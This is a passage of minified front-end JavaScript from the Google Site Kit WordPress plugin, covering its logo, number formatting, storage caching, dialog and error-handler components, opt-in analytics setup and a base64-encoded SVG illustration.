1.175-.322.322-.71.488-1.176.488-.455 0-.854-.166-1.175-.488a1.6 1.6 0 0 1-.488-1.175c0-.466.166-.854.488-1.176s.71-.488 1.175-.488c.455 0 .854.166 1.176.488.332.333.487.72.487 1.176m-.477 4.313v12.498h-2.351V7.43zM77.016 20.128c-1.02 0-1.864-.31-2.54-.943q-1.014-.948-1.031-2.628V9.57h-2.196V7.43h2.196V3.603h2.35V7.43h3.061v2.14h-3.06v6.222c0 .831.166 1.397.488 1.696.321.3.687.444 1.097.444.189 0 .366-.022.555-.067.188-.044.344-.1.499-.166l.743 2.096c-.632.222-1.342.333-2.162.333M2.673 18.952C1.375 18.009.488 16.678 0 14.97l2.883-1.176c.289 1.076.799 1.94 1.542 2.628.732.677 1.619 1.02 2.65 1.02.965 0 1.774-.244 2.45-.742.677-.5 1.01-1.187 1.01-2.052 0-.798-.3-1.453-.887-1.974q-.883-.781-3.094-1.564l-1.22-.432Q3.371 9.997 2.04 8.716C1.153 7.862.71 6.742.71 5.346c0-.966.266-1.853.787-2.673S2.75 1.209 3.693.72C4.624.244 5.678 0 6.864 0c1.708 0 3.072.41 4.081 1.242 1.02.832 1.697 1.752 2.04 2.795L10.236 5.2c-.2-.621-.576-1.164-1.142-1.63-.565-.477-1.286-.71-2.173-.71s-1.641.222-2.251.676-.91 1.032-.91 1.742c0 .676.278 1.22.82 1.663.544.432 1.398.854 2.563 1.253l1.22.41c1.674.577 2.96 1.342 3.88 2.274.921.931 1.376 2.184 1.376 3.748 0 1.275-.322 2.34-.976 3.193a6 6 0 0 1-2.495 1.919 8 8 0 0 1-3.116.621c-1.62 0-3.072-.466-4.358-1.408M15.969 3.449a1.95 1.95 0 0 1-.588-1.43c0-.566.2-1.043.588-1.431A1.95 1.95 0 0 1 17.399 0c.566 0 1.043.2 1.43.588.389.388.588.865.588 1.43 0 .566-.2 1.043-.587 1.43a1.95 1.95 0 0 1-1.43.589c-.566-.012-1.043-.2-1.431-.588m-.067 2.595h2.994v13.883h-2.994zM25.406 19.85c-.544-.2-.987-.466-1.331-.788-.776-.776-1.176-1.84-1.176-3.182V8.683h-2.428v-2.64h2.428V2.13h2.994v3.926h3.372v2.639h-3.372v6.531c0 .743.145 1.276.433 1.575.277.366.743.543 1.42.543.31 0 .576-.044.82-.122q.35-.116.765-.399v2.917c-.599.277-1.32.41-2.173.41a5 5 0 0 1-1.753-.3M33.623 19.407a6.63 6.63 0 0 1-2.529-2.628c-.61-1.12-.909-2.373-.909-3.77 0-1.332.3-2.551.887-3.693.588-1.132 1.409-2.04 2.462-2.706s2.251-1.01 3.593-1.01c1.397 0 2.606.311 3.637.921a6.1 6.1 0 0 1 2.34 2.528c.532 1.076.799 2.274.799 3.627 0 .255-.023.576-.078.953H33.179c.111 1.287.566 2.285 1.375 2.983a4.16 4.16 0 0 0 2.817 1.043c.854 0 1.597-.189 2.218-.588a4.27 4.27 0 0 0 1.508-1.597l2.528 1.198q-.981 1.713-2.561 2.694c-1.054.655-2.318.976-3.782.976q-2.046.033-3.66-.931m7.23-8.051a3.3 3.3 0 0 0-.466-1.453c-.277-.477-.687-.887-1.242-1.208-.554-.322-1.23-.488-2.03-.488-.964 0-1.773.288-2.439.853-.665.566-1.12 1.342-1.375 2.296z"})));var c=i(55989),g=i(62540);const d=function Logo(){return(0,g.jsxs)("div",{className:"googlesitekit-logo","aria-hidden":"true",children:[(0,g.jsx)(r.A,{className:"googlesitekit-logo__logo-g",height:"34",width:"32"}),(0,g.jsx)(l,{className:"googlesitekit-logo__logo-sitekit",height:"26",width:"99"}),(0,g.jsx)(c.A,{children:(0,o.__)("Site Kit by Google Logo","google-site-kit")})]})}},48276:(e,t,i)=>{i.d(t,{VZ:()=>r,dc:()=>s,pH:()=>o,r0:()=>a});var n=i(84024);function o(e){try{return new URL(e).pathname}catch{}return null}function r(e,t){try{return new URL(t,e).href}catch{}return("string"==typeof e?e:"")+("string"==typeof t?t:"")}function s(e){return"string"!=typeof e?e:e.replace(/^https?:\/\/(www\.)?/i,"").replace(/\/$/,"")}function a(e,t){if(!(0,n.m)(e))return e;if(e.length<=t)return e;const i=new URL(e),o=e.replace(i.origin,"");if(o.length<t)return o;const r=o.length-Math.floor(t)+1;return"…"+o.substr(r)}},49383:e=>{e.exports=googlesitekit.components},49746:(e,t,i)=>{i.d(t,{Eo:()=>d,JK:()=>I,K5:()=>m,jq:()=>p,mK:()=>g});var n=i(17243),o=i(50532),r=i.n(o),s=i(82871);function a(e,t={}){const{formatUnit:i,formatDecimal:n}=function(e,t={}){const{hours:i,minutes:n,seconds:o}=l(e);return{hours:i,minutes:n,seconds:o,formatUnit(){const{unitDisplay:r="short",...a}=t,l={unitDisplay:r,...a,style:"unit"};return 0===e?p(o,{...l,unit:"second"}):(0,s.sprintf)(/* translators: 1: formatted seconds, 2: formatted minutes, 3: formatted hours */ /* translators: 1: formatted seconds, 2: formatted minutes, 3: formatted hours */ (0,s._x)("%3$s %2$s %1$s","duration of time: hh mm ss","google-site-kit"),o?p(o,{...l,unit:"second"}):"",n?p(n,{...l,unit:"minute"}):"",i?p(i,{...l,unit:"hour"}):"").trim()},formatDecimal(){const t=(0,s.sprintf)( // translators: %s: number of seconds with "s" as the abbreviated unit. // translators: %s: number of seconds with "s" as the abbreviated unit. (0,s.__)("%ds","google-site-kit"),o);if(0===e)return t;const r=(0,s.sprintf)( // translators: %s: number of minutes with "m" as the abbreviated unit. // translators: %s: number of minutes with "m" as the abbreviated unit. (0,s.__)("%dm","google-site-kit"),n),a=(0,s.sprintf)( // translators: %s: number of hours with "h" as the abbreviated unit. // translators: %s: number of hours with "h" as the abbreviated unit. (0,s.__)("%dh","google-site-kit"),i);return(0,s.sprintf)(/* translators: 1: formatted seconds, 2: formatted minutes, 3: formatted hours */ /* translators: 1: formatted seconds, 2: formatted minutes, 3: formatted hours */ (0,s._x)("%3$s %2$s %1$s","duration of time: hh mm ss","google-site-kit"),o?t:"",n?r:"",i?a:"").trim()}}}(e,t);try{return i()}catch{return n()}}function l(e){e=parseInt(e,10),Number.isNaN(e)&&(e=0);return{hours:Math.floor(e/60/60),minutes:Math.floor(e/60%60),seconds:Math.floor(e%60)}}function c(e){return 1e6<=e?Math.round(e/1e5)/10:1e4<=e?Math.round(e/1e3):1e3<=e?Math.round(e/100)/10:e}function g(e){let t={};return"%"===e?t={style:"percent",maximumFractionDigits:2}:"s"===e?t={style:"duration",unitDisplay:"narrow"}:e&&"string"==typeof e?t={style:"currency",currency:e}:(0,n.isPlainObject)(e)&&(t={...e}),t}function d(e,t={}){e=(0,n.isFinite)(e)?e:Number(e),(0,n.isFinite)(e)||(console.warn("Invalid number",e,typeof e),e=0);const i=g(t),{style:o="metric"}=i;return"metric"===o?function(e){const t={minimumFractionDigits:1,maximumFractionDigits:1};return 1e6<=e?(0,s.sprintf)( // translators: %s: an abbreviated number in millions. // translators: %s: an abbreviated number in millions. (0,s.__)("%sM","google-site-kit"),p(c(e),e%10==0?{}:t)):1e4<=e?(0,s.sprintf)( // translators: %s: an abbreviated number in thousands. // translators: %s: an abbreviated number in thousands. (0,s.__)("%sK","google-site-kit"),p(c(e))):1e3<=e?(0,s.sprintf)( // translators: %s: an abbreviated number in thousands. // translators: %s: an abbreviated number in thousands. (0,s.__)("%sK","google-site-kit"),p(c(e),e%10==0?{}:t)):p(e,{signDisplay:"never",maximumFractionDigits:1})}(e):"duration"===o?a(e,i):"durationISO"===o?function(e){let{hours:t,minutes:i,seconds:n}=l(e);return n=("0"+n).slice(-2),i=("0"+i).slice(-2),t=("0"+t).slice(-2),"00"===t?`${i}:${n}`:`${t}:${i}:${n}`}(e):p(e,i)}const u=r()(console.warn);function p(e,t={}){const{locale:i=I(),...n}=t;try{return new Intl.NumberFormat(i,n).format(e)}catch(t){u(`Site Kit numberFormat error: Intl.NumberFormat( ${JSON.stringify(i)}, ${JSON.stringify(n)} ).format( ${typeof e} )`,t.message)}const o={currencyDisplay:"narrow",currencySign:"accounting",style:"unit"},r=["signDisplay","compactDisplay"],s={};for(const[e,t]of Object.entries(n))o[e]&&t===o[e]||r.includes(e)||(s[e]=t);try{return new Intl.NumberFormat(i,s).format(e)}catch{return new Intl.NumberFormat(i).format(e)}}function m(e,t={}){const{locale:i=I(),style:n="long",type:o="conjunction"}=t;if(Intl.ListFormat){return new Intl.ListFormat(i,{style:n,type:o}).format(e)} /* translators: used between list items, there is a space after the comma. */const r=(0,s.__)(", ","google-site-kit");return e.join(r)}function I(e=i.g){const t=(0,n.get)(e,["_googlesitekitLegacyData","locale"]);if(t){const e=t.match(/^(\w{2})?(_)?(\w{2})/);if(e&&e[0])return e[0].replace(/_/g,"-")}return e.navigator.language}},49993:(e,t,i)=>{i.d(t,{Gq:()=>d,IL:()=>I,LD:()=>p,SO:()=>u,a2:()=>o,xD:()=>m});var n=i(6109);const o="googlesitekit_",r=`${o}1.170.0_${i.g._googlesitekitBaseData.storagePrefix}_`,s=["sessionStorage","localStorage"];let a,l=[...s];async function c(e){const t=i.g[e];if(!t)return!1;try{const e="__storage_test__";return t.setItem(e,e),t.removeItem(e),!0}catch(e){return e instanceof DOMException&&(22===e.code||1014===e.code||"QuotaExceededError"===e.name||"NS_ERROR_DOM_QUOTA_REACHED"===e.name)&&0!==t.length}}async function g(){if(void 0!==a)return a;for(const e of l)a||await c(e)&&(a=i.g[e]);return void 0===a&&(a=null),a}async function d(e){const t=await g();if(t){const i=t.getItem(`${r}${e}`);if(i){const e=JSON.parse(i),{timestamp:t,ttl:n,value:o,isError:r}=e;if(t&&(!n||Math.round(Date.now()/1e3)-t<n))return{cacheHit:!0,value:o,isError:r}}}return{cacheHit:!1,value:void 0}}async function u(e,t,{ttl:o=n.Jg,timestamp:s=Math.round(Date.now()/1e3),isError:a=!1}={}){const l=await g();if(l)try{return l.setItem(`${r}${e}`,JSON.stringify({timestamp:s,ttl:o,value:t,isError:a})),!0}catch(e){return i.g.console.warn("Encountered an unexpected storage error:",e),!1}return!1}async function p(e){const t=await g();if(t)try{const i=e.startsWith(o)?e:`${r}${e}`;return t.removeItem(i),!0}catch(e){return i.g.console.warn("Encountered an unexpected storage error:",e),!1}return!1}async function m(){const e=await g();if(e)try{const t=[];for(let i=0;i<e.length;i++){const n=e.key(i);0===n.indexOf(o)&&t.push(n)}return t}catch(e){return i.g.console.warn("Encountered an unexpected storage error:",e),[]}return[]}async function I(){if(await g()){const e=await m();for(const t of e)await p(t);return!0}return!1}},50304:(e,t,i)=>{i.d(t,{A:()=>IconWrapper});var n=i(62688),o=i.n(n),r=i(62540);function IconWrapper({children:e,marginLeft:t,marginRight:i}){return(0,r.jsx)("span",{className:"googlesitekit-icon-wrapper",style:{marginLeft:t,marginRight:i},children:e})}IconWrapper.propTypes={children:o().node.isRequired,marginLeft:o().number,marginRight:o().number}},50477:(e,t,i)=>{i.d(t,{C:()=>r,p:()=>o});var n=i(55465);function o(e,t={}){return{__html:n.O.sanitize(e,t)}}function r(e){const t="object"==typeof e?e.toString():e;return t?.replace?.(/\/+$/,"")}},50539:e=>{e.exports=googlesitekit.data},52735:(e,t,i)=>{i.d(t,{A:()=>n});const n=(0,i(63696).createContext)(!1)},55465:(e,t,i)=>{i.d(t,{O:()=>o});var n=i(31234);const o=i.n(n)()(i.g)},55989:(e,t,i)=>{i.d(t,{A:()=>l});var n=i(62688),o=i.n(n),r=i(4452),s=i.n(r),a=i(62540);function VisuallyHidden({className:e,children:t,...i}){return t?(0,a.jsx)("span",{...i,className:s()("screen-reader-text",e),children:t}):null}VisuallyHidden.propTypes={className:o().string,children:o().node},VisuallyHidden.defaultProps={className:""};const l=VisuallyHidden},59865:(e,t,i)=>{i.d(t,{A:()=>p});var n=i(62688),o=i.n(n),r=i(4452),s=i.n(r),a=i(52684),l=i(13606),c=i(82871),g=i(49383),d=i(85149),u=i(62540);function ModalDialog({className:e="",dialogActive:t=!1,handleCancel:i=null,onOpen:n=null,onClose:o=null,title:r=null,provides:p,handleConfirm:m,subtitle:I,confirmButton:h=null,notes:y=[],danger:M=!1,inProgress:N=!1,small:f=!1,medium:j=!1,buttonLink:k=null}){const b=`googlesitekit-dialog-description-${(0,a.A)(ModalDialog)}`,x=!(!p||!p.length);return(0,u.jsxs)(g.Dialog,{open:t,onOpen:n,onClose:o,"aria-describedby":x?b:void 0,tabIndex:"-1",className:s()(e,{"googlesitekit-dialog-sm":f,"googlesitekit-dialog-md":j}),children:[(0,u.jsxs)(g.DialogTitle,{children:[M&&(0,u.jsx)(d.A,{width:28,height:28}),r]}),I?(0,u.jsx)("p",{className:"mdc-dialog__lead",children:I}):[],(0,u.jsxs)(g.DialogContent,{children:[x&&(0,u.jsx)("section",{id:b,className:"mdc-dialog__provides",children:(0,u.jsx)("ul",{className:"mdc-list mdc-list--underlined mdc-list--non-interactive",children:p.map(e=>(0,u.jsx)("li",{className:"mdc-list-item",children:(0,u.jsx)("span",{className:"mdc-list-item__text",children:e})},e))})}),y.length>0&&(0,u.jsx)("section",{className:"mdc-dialog__notes",children:y.map((e,t)=>(0,u.jsxs)("p",{className:"mdc-dialog__note",children:["string"==typeof e&&(0,l.A)((0,c.sprintf)(/* translators: %s is replaced with some sub-note text. */ /* translators: %s is replaced with some sub-note text. */ (0,c.__)("<strong>Note:</strong> %s","google-site-kit"),e),{strong:(0,u.jsx)("strong",{})}),"function"==typeof e&&(0,u.jsx)(e,{})]},`note-${t}`))})]}),(0,u.jsxs)(g.DialogFooter,{children:[(0,u.jsx)(g.Button,{className:"mdc-dialog__cancel-button",onClick:i,disabled:N,tertiary:!0,children:(0,c.__)("Cancel","google-site-kit")}),k?(0,u.jsx)(g.Button,{href:k,onClick:m,target:"_blank",danger:M,children:h}):(0,u.jsx)(g.SpinnerButton,{onClick:m,danger:M,disabled:N,isSaving:N,children:h||(0,c.__)("Disconnect","google-site-kit")})]})]})}ModalDialog.displayName="Dialog",ModalDialog.propTypes={className:o().string,dialogActive:o().bool,handleDialog:o().func,handleConfirm:o().func.isRequired,onOpen:o().func,onClose:o().func,title:o().string,provides:o().arrayOf(o().string),confirmButton:o().string,notes:o().arrayOf(o().oneOfType([o().string,o().elementType])),danger:o().bool,small:o().bool,medium:o().bool,buttonLink:o().string};const p=ModalDialog},61983:(e,t,i)=>{i.d(t,{A:()=>DismissButton});var n=i(62688),o=i.n(n),r=i(82871),s=i(49383),a=i(62540);function DismissButton({className:e,label:t=(0,r.__)("Maybe later","google-site-kit"),onClick:i,disabled:n,tertiary:o=!0}){return i?(0,a.jsx)(s.Button,{className:e,onClick:i,disabled:n,tertiary:o,children:t}):null}DismissButton.propTypes={className:o().string,label:o().string,onClick:o().func,disabled:o().bool,tertiary:o().bool,dismissOptions:o().shape({expiresInSeconds:o().number,skipHidingFromQueue:o().bool})}},62659:(e,t,i)=>{i.d(t,{A:()=>__WEBPACK_DEFAULT_EXPORT__});var n=i(63696),o=i(19826);const __WEBPACK_DEFAULT_EXPORT__=function(){return(0,n.useContext)(o.Ay)}},63081:(e,t,i)=>{i.d(t,{A:()=>Root});var n=i(62688),o=i.n(n),r=i(44010),s=i(77105),a=i(63696),l=i(50539),c=i.n(l),g=i(82871),d=i(6730),u=i(19826),p=i(67510),m=i(6109),I=i(62540);class ErrorHandler extends a.Component{constructor(e){super(e),this.state={error:null,info:null,copied:!1}}componentDidCatch(e,t){i.g.console.error("Caught an error:",e,t),this.setState({error:e,info:t}),(0,m.sx)("react_error",`handle_${this.context||"unknown"}_error`,`${e?.message}\n${t?.componentStack}`.slice(0,500))}render(){const{children:e}=this.props,{error:t,info:i}=this.state;return t?(0,I.jsx)(p.A,{notificationID:"googlesitekit-error",className:"googlesitekit-error-handler",type:"error",title:(0,g.__)("Site Kit encountered an error","google-site-kit"),description:(0,I.jsxs)(a.Fragment,{children:[(0,I.jsx)(d.A,{message:t.message,componentStack:i.componentStack}),(0,I.jsxs)("pre",{className:"googlesitekit-overflow-auto",children:[t.message,i.componentStack]})]})}):e}}ErrorHandler.contextType=u.Ay,ErrorHandler.propTypes={children:o().node.isRequired};const h=ErrorHandler;var y=i(79961);const{Consumer:M,Provider:N}=y.A,f=N;var j=i(84895),k=i(82246),b=i(11999),x=i(70301),T=i(97345),v=i(78990),D=i(94656);const A=function AuthenticatedPermissionsModal(){const e=(0,l.useRegistry)(),t=(0,l.useSelect)(e=>e(T.oR).getPermissionScopeError()),n=(0,l.useSelect)(e=>e(T.oR).getUnsatisfiedScopes()),o=(0,l.useSelect)(e=>e(T.oR).getConnectURL({additionalScopes:t?.data?.scopes,redirectURL:t?.data?.redirectURL||i.g.location.href,errorRedirectURL:t?.data?.errorRedirectURL})),{clearPermissionScopeError:r}=(0,l.useDispatch)(T.oR),{navigateTo:s}=(0,l.useDispatch)(x.M),{setValues:c}=(0,l.useDispatch)(b.s),d=(0,a.useCallback)(()=>{r()},[r]),u=(0,a.useCallback)(async()=>{c(T.$8,{permissionsError:t}),await(0,v.mR)(e),s(o)},[e,o,s,t,c]);return(0,a.useEffect)(()=>{!async function(){t?.data?.skipModal&&t?.data?.scopes?.length&&await u()}()},[u,t]),t?t?.data?.scopes?.length?t?.data?.skipModal||n&&t?.data?.scopes.every(e=>n.includes(e))?null:(0,I.jsx)(D.A,{children:(0,I.jsx)(k.A,{title:(0,g.__)("Additional Permissions Required","google-site-kit"),subtitle:t.message,confirmButton:(0,g.__)("Proceed","google-site-kit"),handleConfirm:u,handleCancel:d,onClose:d,dialogActive:!0,medium:!0})}):(i.g.console.warn("permissionsError lacks scopes array to use for redirect, so not showing the PermissionsModal. permissionsError was:",t),null):null};const S=function PermissionsModal(){return(0,l.useSelect)(e=>e(T.oR).isAuthenticated())?(0,I.jsx)(A,{}):null};const w=function RestoreSnapshots({children:e}){const t=(0,l.useRegistry)(),[i,n]=(0,a.useState)(!1);return(0,a.useEffect)(()=>{i||(async()=>{await(0,v.P9)(t),n(!0)})()},[t,i]),i?e:null};var C=i(15844),z=i(62659),E=i(71264);function FeatureTours(){const e=(0,z.A)(),{triggerTourForView:t}=(0,l.useDispatch)(T.oR);(0,C.A)(()=>{t(e)});const n=(0,l.useSelect)(e=>e(T.oR).getCurrentTour());return(0,a.useEffect)(()=>{if(!n)return()=>{};const e=document.getElementById("js-googlesitekit-main-dashboard");if(!e)return()=>{};const t=new ResizeObserver(()=>{i.g.dispatchEvent(new Event("resize"))});return t.observe(e),()=>{t.disconnect()}},[n]),n?(0,I.jsx)(E.Ay,{tourID:n.slug,steps:n.steps,gaEventCategory:n.gaEventCategory,isRepeatable:n.isRepeatable,callback:n.callback}):null}var _=i(20762),O=i(86582);function Root({children:e,registry:t,viewContext:i=null}){const n=r.D,[o]=(0,a.useState)({key:"Root",value:!0});return(0,I.jsx)(a.StrictMode,{children:(0,I.jsx)(_.Ay,{value:o,children:(0,I.jsx)(l.RegistryProvider,{value:t,children:(0,I.jsx)(f,{value:j.t,children:(0,I.jsx)(u.Kq,{value:i,children:(0,I.jsx)(s.A,{theme:n(),children:(0,I.jsxs)(h,{children:[(0,I.jsxs)(w,{children:[e,i&&(0,I.jsx)(FeatureTours,{})]}),(0,O.A)(i)&&(0,I.jsx)(S,{})]})})})})})})})}Root.propTypes={children:o().node,registry:o().object,viewContext:o().string.isRequired},Root.defaultProps={registry:c()}},65054:(e,t,i)=>{i.d(t,{M9:()=>x,sx:()=>k,BI:()=>b});var n=i(17243);const o="_googlesitekitDataLayer",r="data-googlesitekit-gtag";function s(e){return function(){e[o]=e[o]||[],e[o].push(arguments)}}var a=i(84895);const l={activeModules:[],isAuthenticated:!1,referenceSiteURL:"",trackingEnabled:!1,trackingID:"",userIDHash:"",userRoles:[]};const{activeModules:c=[],isSiteKitScreen:g,trackingEnabled:d,trackingID:u,referenceSiteURL:p,userIDHash:m,isAuthenticated:I,userRoles:h}=i.g._googlesitekitTrackingData||{},y={activeModules:c,trackingEnabled:d,trackingID:u,referenceSiteURL:p,userIDHash:m,isSiteKitScreen:g,userRoles:h,isAuthenticated:I,pluginVersion:"1.170.0"},{enableTracking:M,disableTracking:N,isTrackingEnabled:f,initializeSnippet:j,trackEvent:k,trackEventOnce:b}=function(e,t=i.g,c=i.g){const g={...l,...e};g.referenceSiteURL&&(g.referenceSiteURL=g.referenceSiteURL.toString().replace(/\/+$/,""));const d=function(e,t){const n=s(t);let l;const{activeModules:c,referenceSiteURL:g,userIDHash:d,userRoles:u=[],isAuthenticated:p,pluginVersion:m}=e;return function(){const{document:t}=i.g;if(void 0===l&&(l=!!t.querySelector(`script[${r}]`)),l)return!1;l=!0;const s=u?.length?u.join(","):"";n("js",new Date),n("config",e.trackingID,{groups:"site_kit",send_page_view:e.isSiteKitScreen,domain:g,plugin_version:m||"",enabled_features:Array.from(a.t).join(","),active_modules:c.join(","),authenticated:p?"1":"0",user_properties:{user_roles:s,user_identifier:d}});const I=t.createElement("script");return I.setAttribute(r,""),I.async=!0,I.src=`https://www.googletagmanager.com/gtag/js?id=${e.trackingID}&l=${o}`,t.head.appendChild(I),{scriptTagSrc:`https://www.googletagmanager.com/gtag/js?id=${e.trackingID}&l=${o}`}}}(g,t),u=function(e,t,i,n){const o=s(t);return async function(t,r,s,a){const{trackingEnabled:l}=e;if(!l)return null;i();const c={send_to:"site_kit",event_category:t,event_label:s,value:a};return new Promise(e=>{const i=setTimeout(function(){n.console.warn(`Tracking event "${r}" (category "${t}") took too long to fire.`),e()},1e3);function s(){clearTimeout(i),e()}o("event",r,{...c,event_callback:s}),n._gaUserPrefs?.ioo?.()&&s()})}}(g,t,d,c),p={};return{enableTracking:function(){g.trackingEnabled=!0},disableTracking:function(){g.trackingEnabled=!1},initializeSnippet:d,isTrackingEnabled:function(){return!!g.trackingEnabled},trackEvent:u,trackEventOnce:function(...e){const t=JSON.stringify(e);p[t]||(p[t]=(0,n.once)(u)),p[t](...e)}}}(y);function x(e){e?M():N()}g&&d&&j()},67510:(e,t,i)=>{i.d(t,{Q:()=>M,A:()=>BannerNotification});var n=i(4452),o=i.n(n),r=i(62688),s=i.n(r),a=i(50539),l=i(8732),c=i(68761),g=i(83891),d=i(41671),u=i(71189),p=i(61983),m=i(10740);const I="data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMzYwIiBoZWlnaHQ9IjIzNCIgdmlld0JveD0iMCAwIDM2MCAyMzQiIGZpbGw9Im5vbmUiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+CjxwYXRoIGQ9Ik03My4xMzAyIDE3MC42NjhDODkuMzcxOSAxODkuOTkgMTE1LjQ3NiAxOTUuMTEgMTMxLjg2NSAxODkuOTkxQzE1My4yNDYgMTgzLjMxMiAxNjYuNjcyIDE2Mi45NjcgMTg1LjUwMiAxNjAuNTQ0QzIwNC4zMzMgMTU4LjEyMSAyMTUuNDA2IDE2OC43MDYgMjM1Ljg5NyAxNzAuMjMzQzI1Ni4zODkgMTcxLjc2IDI4MS4yMzIgMTY3LjYzIDI5Mi43OTEgMTM3LjkzNUMzMDQuMzQ5IDEwOC4yMzkgMjkzLjk0OCA3OC4yMzIxIDI3MC4yMTQgNjQuMzYxNUMyNDYuNDgxIDUwLjQ5MDggMjMzLjI3MSA2Ni43Njk0IDIxMC41NjQgNjguMTIzN0MxODcuODU4IDY5LjQ3NzkgMTc4LjAyMyA0NS44NTI4IDE2MS4wMjMgNDQuMzUyOEMxNDQuMDIzIDQyLjg1MjggMTM0LjUyMyA0NS44NTMgMTI0LjUyMyA1OC44NTI5QzExNC41MjMgNzEuODUyOCAxMjAuMzcxIDg1Ljc2NDEgODkuNTIzNSA5OS44NTNDNTguNjc1OCAxMTMuOTQyIDU2Ljg4ODUgMTUxLjM0NSA3My4xMzAyIDE3MC42NjhaIiBmaWxsPSIjRkZFNEIxIi8+CjxnIGZpbHRlcj0idXJsKCNmaWx0ZXIwX2RfMjcwNV8xNzY4NikiPgo8cmVjdCB4PSIxMTYuNTIzIiB5PSI1Ny45MTk5IiB3aWR0aD0iMTI4IiBoZWlnaHQ9IjEyOC41MzMiIHJ4PSI2Ljk4MjUyIiBmaWxsPSIjRUJFRUYwIi8+CjxtYXNrIGlkPSJtYXNrMF8yNzA1XzE3Njg2IiBzdHlsZT0ibWFzay10eXBlOmFscGhhIiBtYXNrVW5pdHM9InVzZXJTcGFjZU9uVXNlIiB4PSIxMTYiIHk9IjU3IiB3aWR0aD0iMTI5IiBoZWlnaHQ9IjEzMiI+CjxyZWN0IHg9IjExNi41MjMiIHk9IjU3LjkxOTkiIHdpZHRoPSIxMjgiIGhlaWdodD0iMTMwLjEzMyIgcng9IjYuOTgyNTIiIGZpbGw9IiNERUUzRTYiLz4KPC9tYXNrPgo8ZyBtYXNrPSJ1cmwoI21hc2swXzI3MDVfMTc2ODYpIj4KPHJlY3QgeD0iMTI1LjA1NyIgeT0iMTE3LjY1MyIgd2lkdGg9IjExMC40IiBoZWlnaHQ9IjMwLjkzMzMiIHJ4PSIzLjc1MTI4IiBmaWxsPSIjRjNGNUY3Ii8+CjxyZWN0IHg9IjEyNS4wNTciIHk9IjEwMy4yNTMiIHdpZHRoPSIxMTAuNCIgaGVpZ2h0PSIzMC45MzMzIiByeD0iMy43NTEyOCIgZmlsbD0iI0YzRjVGNyIvPgo8cmVjdCB4PSIxMjUuMDU3IiB5PSIxNTYuMDUzIiB3aWR0aD0iMTEwLjQiIGhlaWdodD0iMzAuOTMzMyIgcng9IjMuNzUxMjgiIGZpbGw9IiNGM0Y1RjciLz4KPHJlY3Qgd2lkdGg9IjMyIiBoZWlnaHQ9IjE4Ljk0NjUiIHJ4PSIyLjMxNTY5IiB0cmFuc2Zvcm09Im1hdHJpeCgxIDAgMCAtMSAyMDMuNDU3IDk1LjYyNDkpIiBmaWxsPSIjRjNGNUY3Ii8+CjxyZWN0IHdpZHRoPSIzMiIgaGVpZ2h0PSIxOC45NDY1IiByeD0iMi4zMTU2OSIgdHJhbnNmb3JtPSJtYXRyaXgoMSAwIDAgLTEgMTYzLjk5IDk1LjYyNTcpIiBmaWxsPSIjRjNGNUY3Ii8+CjxyZWN0IHdpZHRoPSIzMiIgaGVpZ2h0PSIxOC45NDY1IiByeD0iMi4zMTU2OSIgdHJhbnNmb3JtPSJtYXRyaXgoMSAwIDAgLTEgMTI0LjUyMyA5NS42MjU3KSIgZmlsbD0iI0YzRjVGNyIvPgo8L2c+CjxwYXRoIGQ9Ik0xMTYuNTIzIDY0LjkzNTVDMTE2LjUyMyA2MS4wNzkyIDExOS42NSA1Ny45NTMgMTIzLjUwNiA1Ny45NTNIMjM3LjM4M0MyNDEuMjM5IDU3Ljk1MyAyNDQuMzY1IDYxLjA3OTIgMjQ0LjM2NSA2NC45MzU1VjY4LjUzM0gxMTYuNTIzVjY0LjkzNTVaIiBmaWxsPSJ3aGl0ZSIvPgo8cmVjdCB4PSIxMjEuODEzIiB5PSI2MS40Nzk2IiB3aWR0aD0iMy41MjY2NyIgaGVpZ2h0PSIzLjUyNjY3IiByeD0iMS43NjMzMyIgZmlsbD0iI0YzRjVGNyIvPgo8cmVjdCB4PSIxMjcuMTA0IiB5PSI2MS40Nzk2IiB3aWR0aD0iMy41MjY2NyIgaGVpZ2h0PSIzLjUyNjY3IiByeD0iMS43NjMzMyIgZmlsbD0iI0YzRjVGNyIvPgo8cmVjdCB4PSIxMzIuNDM3IiB5PSI2MS40Nzk2IiB3aWR0aD0iMy41MjY2NyIgaGVpZ2h0PSIzLjUyNjY3IiByeD0iMS43NjMzMyIgZmlsbD0iI0YzRjVGNyIvPgo8L2c+CjxjaXJjbGUgY3g9IjE4MC41MjMiIGN5PSIxMjAuODUzIiByPSIxNy4zNzkzIiBmaWxsPSIjNEUzMzAwIiBzdHJva2U9IndoaXRlIiBzdHJva2Utd2lkdGg9IjIuNzU4NjIiLz4KPGNpcmNsZSBjeD0iMS42NTUxNyIgY3k9IjEuNjU1MTciIHI9IjEuNjU1MTciIHRyYW5zZm9ybT0ibWF0cml4KDEgMCAwIC0xIDE3OC44NjggMTE2Ljk5MSkiIGZpbGw9IiNGRkU0QjEiLz4KPHJlY3Qgd2lkdGg9IjMuMzEwMzQiIGhlaWdodD0iOS4zNzkzMSIgcng9IjEuNjU1MTciIHRyYW5zZm9ybT0ibWF0cml4KDEgMCAwIC0xIDE3OC44NjggMTI4LjU3NykiIGZpbGw9IiNGRkU0QjEiLz4KPGRlZnM+CjxmaWx0ZXIgaWQ9ImZpbHRlcjBfZF8yNzA1XzE3Njg2IiB4PSIxMDcuOTkiIHk9IjUxLjUxOTkiIHdpZHRoPSIxNDUuMDY3IiBoZWlnaHQ9IjE0Ni4xMzMiIGZpbHRlclVuaXRzPSJ1c2VyU3BhY2VPblVzZSIgY29sb3ItaW50ZXJwb2xhdGlvbi1maWx0ZXJzPSJzUkdCIj4KPGZlRmxvb2QgZmxvb2Qtb3BhY2l0eT0iMCIgcmVzdWx0PSJCYWNrZ3JvdW5kSW1hZ2VGaXgiLz4KPGZlQ29sb3JNYXRyaXggaW49IlNvdXJjZUFscGhhIiB0eXBlPSJtYXRyaXgiIHZhbHVlcz0iMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMTI3IDAiIHJlc3VsdD0iaGFyZEFscGhhIi8+CjxmZU9mZnNldCBkeT0iMi4xMzMzMyIvPgo8ZmVHYXVzc2lhbkJsdXIgc3RkRGV2aWF0aW9uPSI0LjI2NjY3Ii8+CjxmZUNvbXBvc2l0ZSBpbjI9ImhhcmRBbHBoYSIgb3BlcmF0b3I9Im91dCIvPgo8ZmVDb2xvck1hdHJpeCB0eXBlPSJtYXRyaXgiIHZhbHVlcz0iMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMC